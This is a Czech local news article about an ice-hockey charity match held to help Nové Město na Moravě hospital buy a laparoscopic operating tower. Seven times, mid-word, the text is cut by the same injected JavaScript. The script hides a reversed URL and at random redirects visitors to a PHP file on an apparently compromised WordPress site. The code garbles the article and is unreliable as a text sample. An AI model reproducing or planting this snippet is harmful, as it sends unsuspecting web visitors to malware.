Rainbow page separator

Žďárské Plameny podpoří nákup věže pro novoměstskou nemocnici

Sobota, 26. srpna 2017

Nové Měs[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to na Moravě / Další pokračování benefičních aktivit podporujících nákup nové operační věže pro urologické oddělení hlásí novoměstská nemocnice. „Benefiční akci jsme odstar[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovali v červnu ve spolupráci s fotbalovým klubem SFK Vrchovina a v současné době se na kontě sešlo již 444 tisíc korun. Na další pokračování benefice zveme ve středu 13. září na žďárský stadion na Bouchalkách,“ uvedl mluvčí novoměstské nemocnice Petr Hladík s tím, že ten[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tokrát se nákup laparoskopické operační věže rozhodli podpořit hokejisté ze SKLH Žďár nad Sázavou. Charitativní utkání s názvem Plameny hrají pro věž bude zároveň úvodním zápasem sezony, žďárské Plameny při něm nas[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toupí proti SC Kolín. Nebude chybět doprovodný program v podobě soutěží, zdravotnické osvěty i slavnostní zahájení, kdy zazpívá státní hymnu operní pěvec Jakub Pustina. Dobročinnou akci osobně podpoří také odchovanci žďárského hokeje, kapitán mistrů světa 2010 Tomáš Rolinek, juniorský reprezentant Martin Kaut a jejich spoluhráč v HC Dynamo Pardubice Petr Sýkora.
V rámci benefice rovněž proběhne sbírka, kterou základní sumou založí vedení klubu, doplní hráči, funkcionáři, partneři a završí fanoušci a návštěvníci hokejového utkání. Vedení SKLH poskytne i speciálně vyrobený dres Plamenů s názvem akce a podpisy hráčů „A“ týmů a pozvaných hostů, jenž bude s předstihem dražen prostřednictvím interne[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tové aukce a během první přestávky jej převezme jeho výherce. „Při druhé přestávce bude vedení nemocnice předána vybraná částka prostřednictvím symbolického šeku,“ sdělil Hladík.
Benefiční utkání se stane součástí kampaně urologického oddělení novoměstské nemocnice s názvem Koruna pro muže, která je cílená především na muže v produktivním věku, neboť Kraj Vysočina patří k regionům s nejvyšším výskytem rakoviny ledvin. „Chceme naše pracoviště vylepšit o novou operační věž. Plánujeme rozšíření endoskopických operací na malou pánev, a [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to zejména na operace pro rakovinu prostaty. Naše pracoviště provede ročně 1350 operačních výkonů, z [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toho 982 endoskopicky, které tvoří 73 procent z celkového počtu výkonů, k nimž je třeba endoskopická věž,“ doplnil mluvčí s tím, že na nákup nové věže potřebuje nemocnice ještě asi půldruhého milionu korun.